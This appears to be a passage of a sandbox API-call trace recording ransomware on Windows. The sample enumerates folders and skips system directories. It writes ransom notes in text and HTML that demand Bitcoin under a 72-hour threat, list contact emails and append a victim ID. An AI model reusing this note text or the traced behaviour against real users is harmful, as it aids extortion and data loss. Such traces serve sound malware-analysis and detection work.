	[0177.565] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1
	[0177.565] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0
	[0177.565] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0177.565] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0177.565] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\WinMSIPC" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC"
	[0177.566] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*"
	[0177.566] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.566] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.566] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\HELP_DECRYPT_YOUR_FILES.TXT") returned 65
	[0177.566] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.567] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.567] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.570] CloseHandle (hObject=0x384) returned 1
	[0177.570] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.571] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.571] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.572] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.572] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.572] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.573] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.573] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.573] CloseHandle (hObject=0x384) returned 1
	[0177.573] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.574] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.574] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.574] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\HELP_DECRYPT_YOUR_FILES.HTML") returned 66
	[0177.574] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.574] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.575] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.577] CloseHandle (hObject=0x384) returned 1
	[0177.577] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.578] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.578] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.578] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.580] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.580] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.580] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.580] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.580] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.581] CloseHandle (hObject=0x384) returned 1
	[0177.581] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x836044f3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.581] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*") returned 41
	[0177.581] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.581] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\all users\\microsoft\\winmsipc\\*.*") returned 0x29
	[0177.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="windows") returned 0x0
	[0177.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="boot") returned 0x0
	[0177.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="system volume information") returned 0x0
	[0177.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="temp") returned 0x0
	[0177.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="program files") returned 0x0
	[0177.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="appdata") returned 0x0
	[0177.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="application data") returned 0x0
	[0177.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="winnt") returned 0x0
	[0177.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.584] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="tmp") returned 0x0
	[0177.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="cache") returned 0x0
	[0177.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="webcache") returned 0x0
	[0177.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.585] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="inetcache") returned 0x0
	[0177.585] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="nvidia") returned 0x0
	[0177.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="packages") returned 0x0
	[0177.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="cookies") returned 0x0
	[0177.586] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.586] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\*.*", lpSrch="programdata") returned 0x0
	[0177.587] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.587] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x836044f3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.587] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x836044f3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x836044f3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x836044f3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x835de29c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x835de29c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x836044f3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.587] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1
	[0177.587] lstrcmpW (lpString1="Server", lpString2="..") returned 1
	[0177.587] lstrcmpW (lpString1="Server", lpString2=".") returned 1
	[0177.588] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\WinMSIPC" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC"
	[0177.588] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\"
	[0177.588] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\", lpString2="Server" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server"
	[0177.588] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server"
	[0177.588] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\"
	[0177.596] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\"
	[0177.596] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*"
	[0177.596] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.598] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*") returned 48
	[0177.598] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.598] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*", cchLength=0x30 | out: lpsz="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*") returned 0x30
	[0177.598] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.599] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="windows") returned 0x0
	[0177.599] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.599] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="boot") returned 0x0
	[0177.599] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.599] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="system volume information") returned 0x0
	[0177.599] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.599] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.599] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.600] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="temp") returned 0x0
	[0177.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.600] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="program files") returned 0x0
	[0177.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.600] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.600] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="appdata") returned 0x0
	[0177.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.601] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="application data") returned 0x0
	[0177.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.601] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="winnt") returned 0x0
	[0177.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.601] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="tmp") returned 0x0
	[0177.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.601] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="cache") returned 0x0
	[0177.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="webcache") returned 0x0
	[0177.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="inetcache") returned 0x0
	[0177.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="nvidia") returned 0x0
	[0177.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.603] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="packages") returned 0x0
	[0177.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.603] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="cookies") returned 0x0
	[0177.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.603] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\winmsipc\\server\\*.*", lpSrch="programdata") returned 0x0
	[0177.603] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.604] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0177.604] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.604] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.605] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server"
	[0177.605] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*"
	[0177.605] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.605] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.605] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\HELP_DECRYPT_YOUR_FILES.TXT") returned 72
	[0177.605] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
